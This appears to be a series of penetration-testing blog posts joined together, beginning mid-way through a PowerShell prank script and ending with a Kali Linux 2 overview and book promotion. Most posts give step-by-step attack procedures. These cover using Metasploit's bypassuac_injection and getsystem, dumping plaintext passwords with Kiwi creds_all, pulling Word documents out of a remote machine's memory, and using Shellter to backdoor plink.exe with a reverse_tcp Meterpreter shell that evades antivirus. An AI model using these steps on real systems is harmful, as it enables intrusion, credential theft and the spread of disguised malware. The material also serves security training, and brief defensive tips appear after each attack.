$IEComObject.visible = $False
$IEComObject.navigate($VideoURL)
$EndTime = (Get-Date).addminutes(3)
Write-Verbose “Loop will end at $EndTime”
#ghetto way to do this but it basically presses volume up to raise volume in a loop for 3 minutes
do {
$WscriptObject = New-Object -com wscript.shell
$WscriptObject.SendKeys([char]175)
}
until ((Get-Date) -gt $EndTime)

The VideoURL string sets the song, which is of course, Thunderstruck. The $IEComObject section tells PowerShell to open Internet Explorer on the target system and navigate to the YouTube video. ** Note ** the .visible = $False section tells PowerShell to hide the IE window so that it does not show up. Set this to $True if you want to be able to see the Internet Explorer window.

The rest of the script creates a 3 minute loop (the length of the song) where the Up Volume key (char 175) is called repeatedly. As mentioned earlier, this loop seems to really draw down the target computer, you may want to set it to a shorter time period.

2. Put the code in a text file, which I called “Thunderstruck.txt“.

3. Base64 encode the script:

And that is it, now all we need to do is use Metasploit to get a remote shell to the target system and then call the encoded script in our remote shell using PowerShell, like so:

And that is it, after a short pause the target remote system will begin playing “Thunderstruck” at maximum volume. If the user tries to turn down the volume using the speaker icon, it will fight them by turning it back up until the song is over!

Defending against this attack

The bad thing about PowerShell based attacks is that most Anti-Viruses and Windows do not see them as malicious. So your best bet is to never, ever open unsolicited attachments you receive in social media sites or via e-mails. Also, run script blocking programs to prevent unwanted scripts from running on sites that you visit. Lastly, never, ever try to build nuclear weapons!

Really enjoyed the article on W00tsec about pulling RAW picture images from memory dumps and thought it would be cool if you could use the same process to pull information from a remote system’s memory using Kali – and you can!

In this tutorial we will see how to pull a Word document from a remote machine’s memory, parse it for text and view it in Kali Linux.

The target system is a Windows 7 PC running Office 2010. We will start with a remote metasploit meterpreter shell session already active. So basically we tricked our test system into running our booby trapped file which created a back door to our Kali system.

So we want to grab the remote memory, but we only want the memory in use by the Word process. Following the w00tsec tutorial we just need to use the SysInternals ProcDump command. ProcDump is available from Microsoft’s Technet site, it is part of the SysInternals Suite. This command allows you to pull memory for specific processes.

You may want to grab the SysInternal’s “Strings” program too while you are there. “Strings” is a Windows version of the Linux command that we will be using later.

These programs will need to be uploaded to the target system from Meterpreter.

Next, in the Metasploit DOS shell, type “tasklist” to see what is running on the remote Windows system:

Further down the list we see that the user has an open session of MS Word (WINWORD.EXE):

Run the procdump command using the “-ma” switch and the process name “WINWORD.EXE”, lastly we will call the resultant dump file “word” as seen below:

We now have a memory dump stored on our remote system called “word.dmp”. The file is pretty large, 362 MB, we could just download that file back to our Kali system – but we can shrink it. We are really only looking for text in the memory dump. We have two options here, we can use the SysInternals “Strings” program to work through the data dump and remove all the text from it (significantly reducing the download size) or we can download the whole file en-mass  back to our Kali system and use the Linux “strings” command to parse it.

The choice is yours, but I will say with just using the default program settings in both, the Linux one did a much better job of parsing the file.

But basically the command is the same in both versions, “strings word.dmp > word.txt”

Now if we open the resultant text file in Kali, we see a ton of information – System settings, variables that are set on the system, I even found registry keys mentioned. But eventually we will see this (Produced with the Linux strings command):

Compare that to the Word document we have open on the Windows 7 machine:

As you can see the Nmap user manual open on our Windows 7 system has been successfully grabbed from memory remotely, and we can now view the text on our Kali system!

I know there are other forensics programs out there that will do basically the same thing, and this is not a forensically sound way of preserving data needed in a legal case, but it is a lot of fun doing this manually and opens up some interesting possibilities!

The best way to defend against these types of attacks are to follow good security practices against social engineering and Phishing type attacks. An attacker would need a remote connection to your system to be able to pull items from your memory. Do not open unknown or unsolicited attachments in e-mails. Be leery of odd sounding links sent to you from a friend’s account and use a script blocker and good AV Internet security program when surfing the web.

Want to learn more about Kali Linux and Metasploit? Check out my book, “Basic Security Testing with Kali Linux“.

If you can get a remote shell during a penetration test, Metasploit’s Bypass UAC module is great for disabling that pesky UAC and escalating an account with admin privileges to the all powerful System level access. The problem is it doesn’t seem to work anymore – so let’s see what changed and get some plain text passwords while we are at it!

Its been a while since I have used Metasploit’s Bypass UAC module and when I went to use it recently, it kept erroring out. Once you had a remote shell with Metasploit all you used to have to do was call the Bypass UAC module, set the session number of the active session and run it. The solution is simple, the module usage has changed slightly.

We will start with an active session to a Windows 7 system:

From here, enter:

• use exploit/windows/local/bypassuac_injection
• set session 1
• set payload windows/meterpreter/reverse_tcp
• set lhost [Kali’s IP Address]
• set lport 4545 (Important: use a different port from one used for original shell)
• exploit

This should execute the Bypass UAC module, creating a new session with UAC disabled:

Now if we type “getsystem” it should work, as verified by “getuid”:

Now that we have a System level shell, what can we do?

Pretty much anything we want. Recover clear text passwords you say? Sure!

Type, “load kiwi“:

Then type, “creds_all“:

Oh look, user “Dan” is using the hyper secure password of “password” – Yikes, not good!

Bypass UAC is now a full exploit module, which means that you need to actually set a payload for it. I recommend using the same one that you got the original shell with. But make sure that when you set up the payload for Bypass UAC that you select a different port number for it to use or it will error out. So on mine, the port used to create session one was 4444, so I chose port 4545 for the UAC exploit.

Lastly, once we had the second shell created by Bypass UAC, we quickly elevated our privileges to system level with the “getsystem” command. Lastly, we used the amazing Mimikatz “Kiwi” extension to grab the plain text passwords for the win!

Want to learn how to use Metasploit and a whole lot more? Check out my book, “Basic Security Testing with Kali Linux” – Also a follow up book is coming out very soon!

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program!

The latest version of Shellter for pentesters was revealed at B-Sides Lisbon earlier this month. Updates include increased obfuscation through a custom encoder and polymorphic decoder. Also this version saves a few steps by including the most common Meterpreter shells.

Shellter works by taking a legit Windows .exe file, adds the shell code to it and then does a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very pain free. In this tutorial I used the latest version of Kali Linux and a Windows 7 Virtual Machine.

So enough talk, let’s see it in action!

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )

**Note: the Kali repos apparently don’t contain the newest 4.0 version yet. To get the latest, instead of using ‘apt-get install shellter’, just download and extract the ZIP file to the “/etc/share” folder.

2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Start Shellter – ‘shellter’ from the terminal or use ‘wineconsole shelter’ from ‘/etc/share/shellter’ if you manually installed.

4. Choose ‘A’ for Automatic Mode

5. At the PE Target Prompt, enter “plink.exe”

6. When prompted for Payloads select “L” and then “1”

7. Next, enter the IP address of your Kali system (mine is 192.168.1.39)

8. And the port to use (I used 5555)

Shellter will obfuscate the code and crunch for a while. Then you should see:

Success!

9. Now we need to start a listener service on the Kali system using the same settings from above:

• start Metasploit (‘msfconsole’ in a terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
• exploit

10. Now that Kali is waiting for a connection. Copy our evil plink.exe command to the Windows 7 system and run it:

And we have a shell!

Compare the size of the backdoored exe to the original one. They are the exact same size! Now upload the backdoored exe to Virustotal and scan it for malicious content:

One (!) anti-virus engine detected it as malicious. And it was not a mainstream AV normally found in companies…

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!

(Post Updated 7/13/15 – Changed command from “wine shellter” to “wineconsole shellter” and updated pictures accordingly.)

Introducing my new book, “Intermediate Security Testing with Kali Linux 2“!

The second book in my Kali Linux series has been released. Picking up where “Basic Security Testing with Kali Linux” left off, this book delves deeper into using post exploitation techniques. It also covers Web Application testing using tools like Burp Suite. It then turns to testing smart devices like Android Phones and tablets. And even includes an entire section on using the Forensics tools in Kali to perform computer security testing.

Topics Include:

• New Metasploit Features and Commands
• Creating Shells with Msfvenom
• Post Modules & Railgun
• PowerShell for Post Exploitation
• Web Application Pentesting
• How to use Burp Suite
• Security Testing Android Devices
• Forensics Tools for Security Testing
• Security Testing an Internet of Things (IoT) Device

And much, much more!

This book was originally written for the first version of Kali and was ready to be released last month. But as the new Kali 2.0 was released I held the book back and completely updated the entire book from beginning to end to cover the new OS and any tool changes. So in essence as it took about a year and a half to write this book, all the information in it has been updated as of this month!

If you are still using the original Kali, not a problem the tools work the same in both versions, though I do recommend updating to the new Kali 2.0 as it has a much better interface and menu system. If you are still using Backtrack, please update to Kali 2 you will thank yourself!

The second book dwarfs the first in both size and content. I took to heart all of the feedback from my first book. I had a lot of request to add more tool coverage, so I added two entire chapters covering included tools and their use. Multiple people asked me to cover the forensics tools, so I added an entire section devoted to security testing with Kali’s Forensics tools. Several people had told me that the first book was confusing in places, as I had an extra month to work on the book before publishing, hopefully this book will be easier to follow and understand than the first.

I even included a chapter on testing Internet of Things (IoT) devices. As IoT devices are becoming all the rage, security testing them is of high importance. We will have an eye opening look at an actually physical security device in use today that has some serious vulnerabilities.

As always, thank you so much for your support and encouragement. The overwhelming support I have received from individual users, technical trainers, corporations, universities, law enforcement agencies and members of the military has been both humbling and an absolute honor. Thank you!

Intermediate Security Testing with Kali 2 Linux

After ten years of evolution, Offensive Security brings us Kali 2.0! Kali 2.0 is by far the easiest to use of all the Backtrack/ Kali releases. For those used to the original Kali, the new Kali looks very different. But it is a good thing! The menus have been completely re-organized and streamlined and many of the tools are represented by helpful icons. Let’s take a look a few minutes and look at some of the new features of Kali 2.

If you purchased my “Basic Security Testing with Kali Linux” book which was written for the original version of Kali, this overview will help get you acclimated to the new desktop look quickly, all the underlying tools are pretty much the same. My new book, “Intermediate Security Testing with Kali Linux 2” is already written for Kali 2.0.

What’s new in Kali 2?

• New user interface
• New Menus and Categories
• Native Ruby 2.0 for faster Metasploit loading
• Desktop notifications
• Built in Screencasting

Kali 2 is much more streamlined and the layout flows very well compared to earlier versions of Kali/ Backtrack. It just feels like everything is at your fingertips and laid out in a very clear and concise manner.

Desktop Overview

The new Desktop looks very good and places everything at your fingertips:

Favorites Bar

The new Kali comes with a customizable “Favorites bar” on the left side of the desktop. This menu lists the most commonly used applications to get you into the action quicker:

Just click on one and the represented tool is automatically started with the required dependencies. For example, clicking on the Metasploit button pre-starts the database software and checks to make sure the default database has been created before launching Metasploit.

Clicking on the “Show Applications” button on the bottom of the favorites bar reveals a lot more applications. The programs are arranged in folders by type:

If you don’t see the app you want, just type in what you are looking for in the search bar.

Applications Menu

A list of common program favorites listed by categories is located under the Applications menu:

The tools are laid out logically by type. For example, just click on the Web Application Analysis menu item to see the most common web app testing tools:

Notice that I didn’t say “all” of the tools for a specific category would be listed. This is because the menu system only shows the top tools and not all of the tools available in Kali. In reality only a fraction of the installed tools in Kali are actually in the menu system. Most of the tools are accessible only from the command line.

Command Line Tools

The majority of tools are installed in the “/usr/share directory”:

These tools (as well as tools listed in the menu) are run simply by typing their name in a terminal. Take a few moments and familiarize yourself with both the menu system and the share directory.

Auto-minimizing windows

Another thing that is new in Kali 2 is that some windows tend to auto-minimize and seem to dis-appear at times. When a window is minimized you will see a white circle to the left of the associated icon on the favorite bar. In the screenshot below, it is showing that I have two terminal windows minimized:

If I click on the terminal icon once the first terminal window will appear, click twice and both minimized terminal windows re-appear:

You can also hit “Alt-Tab” to show minimized windows. Keep the “Alt” key pressed and arrow around to see additional windows.

Workspaces

As in the earlier versions of Kali/ Backtrack you also have workspaces. If you are not familiar with workspaces, they are basically additional desktop screens that you can use. Hitting the “Super Key” (Windows Key) gives you an overview of all windows that you have open. If you have a touch screen monitor you can also grab and pull the workspaces menu open. With workspaces you are able to drag and drop running programs between the workspaces:

Places Menu

The Places menu contains links to different locations in Kali:

Screencasting

Kali 2 also has the capability to do screen casting built in. With this you can record your security testing adventures as they happen!

Apache Webserver

At the time of this writing, the Service Icons to stop, start and restart Apache Web Server seem to have been removed from Kali 2. Not a problem as you can start them from a terminal prompt by using the following commands:

• To Start – “service apache2 start” or “/etc/init.d/apache2 start”
• To Stop – “service apache2 stop” or “/etc/init.d/apache2 stop”
• To Restart – “service apache2 restart” or “/etc/init.d/apache2 restart”

As seen below:

You can now surf to Kali’s webserver, notice the default webpage has changed from Kali 1:

The root website is also one level deeper now located in a folder called HTTP:

So when you use the Apache server, just drop your website pages/folders into the “/var/www/html/” directory instead of the old “/var/www/” directory.

Upgrading

Keeping your Kali install up to date is very important. Enter the following commands to update Kali:

• apt-get update
• apt-get dist-upgrade
• reboot

Hopefully this overview will help get you up and running on Kali 2.0 quickly.

If you want to learn the basics of Ethical Hacking using the powerful Kali Platform using step-by-step hands on tutorials, check out Check out my Kali book series available on Amazon.com:

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 5.1 shellcode injection tool! The latest version of Shellter for pentesters includes a “stealth” mode that retains the functionality of the original host program.

Shellter works by taking a legit Windows .exe file, adds the shell code to it and then does a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very pain free. In this tutorial I used Kali Linux 2.0 as the host and a Windows system as the target.

The new version of Shellter is not included in the repositories yet, so if you want the latest version you will need to download the zip file and install it manually.

So enough talk, let’s see it in action!

(Note: As always, never attempt to access a system that you do not have express written permission to do so. Doing so is illegal and you could end up in jail.)

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )

I saved the extracted folder to the /root/Desktop folder. You will need to make the shellter.exe file executable with the chmod command.

2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Change to the ‘/root/Desktop/shellter’ directory.

4. Start Shellter – type, “wine shellter.exe”

5. Enter “A” for automatic

6. At the PE Target Prompt, enter “plink.exe”

7. When prompted to enable stealth mode enter “Y”:

This new feature allows the backdoored file to still function as originally file. A big help for Red Team pentesters.

8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.

9. Enter your Kali IP address for LHOST.

10. Enter a port to use (I used 4545)

Shellter will then add PolyMorphic code and Obfuscate the file. When done you will see:

You will now have a ‘plink.exe’ (the shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter directory.

11. Now we need to start a listener service on the Kali system using the same settings from above:

• start Metasploit (‘msfconsole’ in a terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 4545
• exploit

12. Copy the ‘plink.exe’ file to the Windows system:

13. Now, in Windows, If you run plink.exe from the command prompt:

It lists the help information for the file, but does not trigger the remote shell yet. But if we actually use plink to connect to another system (a Raspberry Pi) as seen below:

Notice we get the Raspberry Pi ssh login prompt through Plink, but we also get a remote session to the Windows box:

We can run “sysinfo” to view information about the computer:

Success!

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!

If you enjoyed this tutorial, check out my new book, “Intermediate Security Testing with Kali Linux 2“.